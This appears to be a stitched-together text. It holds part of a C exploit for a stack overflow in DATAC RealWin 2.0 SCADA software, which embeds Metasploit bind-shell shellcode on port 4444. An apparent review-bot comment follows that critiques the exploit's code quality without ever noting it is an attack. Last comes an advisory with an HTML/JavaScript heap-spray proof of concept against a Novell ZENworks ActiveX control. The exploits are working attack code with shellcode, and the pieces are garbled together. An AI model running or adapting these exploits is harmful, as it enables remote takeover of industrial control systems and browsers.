{ NULL,0xFFFFFFFF}
};
int main(int argc, char* argv[])
{
WSADATA ws;
SOCKET tcp_socket, tcp_ping;
char bBuffer[0x10] = {0};
struct sockaddr_in peer;
char *pExploitPacket = NULL;
char *pPingPacket = NULL;
ULONG_PTR uFixed;
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5"
"\xd8\xfb\x1b\x83\xeb\xfc\xe2\xf4\x59\xb2\x10\x56\x4d\x21\x04\xe4"
"\x5a\xb8\x70\x77\x81\xfc\x70\x5e\x99\x53\x87\x1e\xdd\xd9\x14\x90"
"\xea\xc0\x70\x44\x85\xd9\x10\x52\x2e\xec\x70\x1a\x4b\xe9\x3b\x82"
"\x09\x5c\x3b\x6f\xa2\x19\x31\x16\xa4\x1a\x10\xef\x9e\x8c\xdf\x33"
"\xd0\x3d\x70\x44\x81\xd9\x10\x7d\x2e\xd4\xb0\x90\xfa\xc4\xfa\xf0"
"\xa6\xf4\x70\x92\xc9\xfc\xe7\x7a\x66\xe9\x20\x7f\x2e\x9b\xcb\x90"
"\xe5\xd4\x70\x6b\xb9\x75\x70\x5b\xad\x86\x93\x95\xeb\xd6\x17\x4b"
"\x5a\x0e\x9d\x48\xc3\xb0\xc8\x29\xcd\xaf\x88\x29\xfa\x8c\x04\xcb"
"\xcd\x13\x16\xe7\x9e\x88\x04\xcd\xfa\x51\x1e\x7d\x24\x35\xf3\x19"
"\xf0\xb2\xf9\xe4\x75\xb0\x22\x12\x50\x75\xac\xe4\x73\x8b\xa8\x48"
"\xf6\x8b\xb8\x48\xe6\x8b\x04\xcb\xc3\xb0\xea\x47\xc3\x8b\x72\xfa"
"\x30\xb0\x5f\x01\xd5\x1f\xac\xe4\x73\xb2\xeb\x4a\xf0\x27\x2b\x73"
"\x01\x75\xd5\xf2\xf2\x27\x2d\x48\xf0\x27\x2b\x73\x40\x91\x7d\x52"
"\xf2\x27\x2d\x4b\xf1\x8c\xae\xe4\x75\x4b\x93\xfc\xdc\x1e\x82\x4c"
"\x5a\x0e\xae\xe4\x75\xbe\x91\x7f\xc3\xb0\x98\x76\x2c\x3d\x91\x4b"
"\xfc\xf1\x37\x92\x42\xb2\xbf\x92\x47\xe9\x3b\xe8\x0f\x26\xb9\x36"
"\x5b\x9a\xd7\x88\x28\xa2\xc3\xb0\x0e\x73\x93\x69\x5b\x6b\xed\xe4"
"\xd0\x9c\x04\xcd\xfe\x8f\xa9\x4a\xf4\x89\x91\x1a\xf4\x89\xae\x4a"
"\x5a\x08\x93\xb6\x7c\xdd\x35\x48\x5a\x0e\x91\xe4\x5a\xef\x04\xcb"
"\x2e\x8f\x07\x98\x61\xbc\x04\xcd\xf7\x27\x2b\x73\x4a\x16\x1b\x7b"
"\xf6\x27\x2d\xe4\x75\xd8\xfb\x1b";
int i,c;
system("cls");
printf("\n\t\t- DATAC RealWin 2.0 SCADA Software -\n");
printf("\tProtocol Command INFOTAG/SET_CONTROL Stack Overflow\n");
printf("\nRuben Santamarta - reversemode.com \n\n");
if( argc < 3 )
{
printf("\nusage: exploit.exe ip TargetNumber");
printf("\n\nexample: exploit 192.168.1.44 1\n\n");
for( i = 0; targets[i].szTarget; i++ )
{
printf("\n[ %d ] - %s", i, targets[i].szTarget);
}
printf("\n");
exit(0);
}
WSAStartup(0x0202,&ws);
peer.sin_family = AF_INET;
peer.sin_port = htons( REALWIN_PORT );
peer.sin_addr.s_addr = inet_addr( argv[1] );
tcp_socket = socket(AF_INET, SOCK_STREAM, 0);
if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)) )
{
printf("\n[!!] Host unreachable :( \n\n");
exit(0);
}
pExploitPacket = (char*) calloc( EXPLOIT_LEN, sizeof(char) );
pPingPacket = (char*) calloc( PING_LEN, sizeof(char) );
memset( (void*)pExploitPacket, 0x90, EXPLOIT_LEN);
memset( (void*)pPingPacket, 0x90, PING_LEN);
uFixed = targets[atoi(argv[2])].retAddr;
for( i=0x0; i< 0xbe; i++)
{
*( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + i*sizeof(ULONG_PTR) +2 ) ) = uFixed;
}
// Bypass silly things.
*( ( ULONG_PTR* ) (BYTE*)(pExploitPacket + 0xbe*sizeof(ULONG_PTR) +2 ) ) = 0x404040;
// MAGIC_HEADER
*( ( ULONG_PTR* ) pExploitPacket ) = PACKET_HEADER_MAGIC;
//Payload Length
*( ( ULONG_PTR* ) pExploitPacket + 1 ) = 0x800;
//MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL)
*( (ULONG_PTR*)(( BYTE*) pExploitPacket + 10 ) ) = FUNC_INFOTAG_SET_CONTROL;
//First Parameter
*( (ULONG_PTR*)(( BYTE*) pExploitPacket + 14 ) ) = 0x4; // Internal Switch
//Mark
*( (ULONG_PTR*)(( BYTE*) pExploitPacket + 44 ) ) = 0xDEADBEEF; // Our marker
memcpy( (void*)((char*)pExploitPacket + EXPLOIT_LEN - sizeof(scode))
,scode
,sizeof(scode)-1);
send(tcp_socket, pExploitPacket, EXPLOIT_LEN, 0 );
printf("[+] Exploit packet sent...now checking host availability\n");
// MAGIC_HEADER
*( ( ULONG_PTR* ) pPingPacket ) = PACKET_HEADER_MAGIC;
//Payload Length
*( ( ULONG_PTR* ) pPingPacket + 1 ) = 0x20;
//MAKE_FUNC(FC_INFOTAG, FCS_SETCONTROL)
*( (ULONG_PTR*)(( BYTE*) pPingPacket + 10 ) ) = FUNC_PING;
//First Parameter
*( (ULONG_PTR*)(( BYTE*) pPingPacket + 14 ) ) = 0x1; // whatever
//Mark
*( (ULONG_PTR*)(( BYTE*) pPingPacket + 44 ) ) = 0xDEADBEEF; //Our marker
tcp_ping = socket(AF_INET, SOCK_STREAM, 0);
if ( connect(tcp_ping, (struct sockaddr*) &peer, sizeof(sockaddr_in)) )
{
printf("\n[!!] Host died, long live to the Host! \n\n");
exit(0);
}
i = recv(tcp_ping, bBuffer, 0x8, 0 );
if( i )
{
printf("[+] The host is up and running\n\t:: %d bytes received: ",i);
for( c = 0; c<i; c++)
printf("%02X ", (unsigned char)bBuffer[c]);
printf("\n");
}else {
printf("\n[!!] Host died, long live to the Host! \n\n");
}
closesocket(tcp_ping);
closesocket(tcp_socket);
Sleep(1000);
printf("\n[+] Try: telnet %s 4444\n\n",argv[1]);
WSACleanup();
return 0;
}
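Review bot: `uFixed = targets[atoi(argv[2])].retAddr;` indexes `targets[]` with an unvalidated command-line integer, so any value outside 0–3 (or a non-numeric argument, which `atoi` turns into 0 without reporting an error) reads past the table; count the entries in the usage loop and reject `t < 0 || t >= count` before the lookup, preferably parsing with `strtol`. The return values of `socket()`, `calloc()` and `recv()` are never checked: a `SOCKET_ERROR` result from `recv` is non-zero, so `if( i )` takes the "host is up and running" branch and prints a negative byte count. Every error path calls `exit(0)`, reporting success to the caller where `EXIT_FAILURE` is expected. `sizeof(sockaddr_in)` without the `struct` tag only compiles as C++, so the `.c` filename is misleading. `main` is entirely inside this hunk.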


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31435/info
Novell ZENworks Desktop Management ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
ZENworks Desktop Management 6.5 is vulnerable; other versions may also be affected.
< html> < head> < title>Novell ZENWorks for Desktops Version 6.5 Remote (Heap-Based) PoC < /head> < body> < script> var buffa1 = unescape("%uce90%u08bc") do { buffa1 += buffa1; } while (buffa1.length < 0x900000); var buffa2 = unescape("%u9090%u9090") do { buffa2 += buffa2; } while (buffa2.length < 0x1500000); buffa1 += buffa2; buffa1 += unescape("%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); < /script> < object id="victim" classid="clsid:0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"> < /object> < script language="vbscript"> appName = String(300, "A") + "?????" victim.CanUninstall appName < /script> < /body> < /html>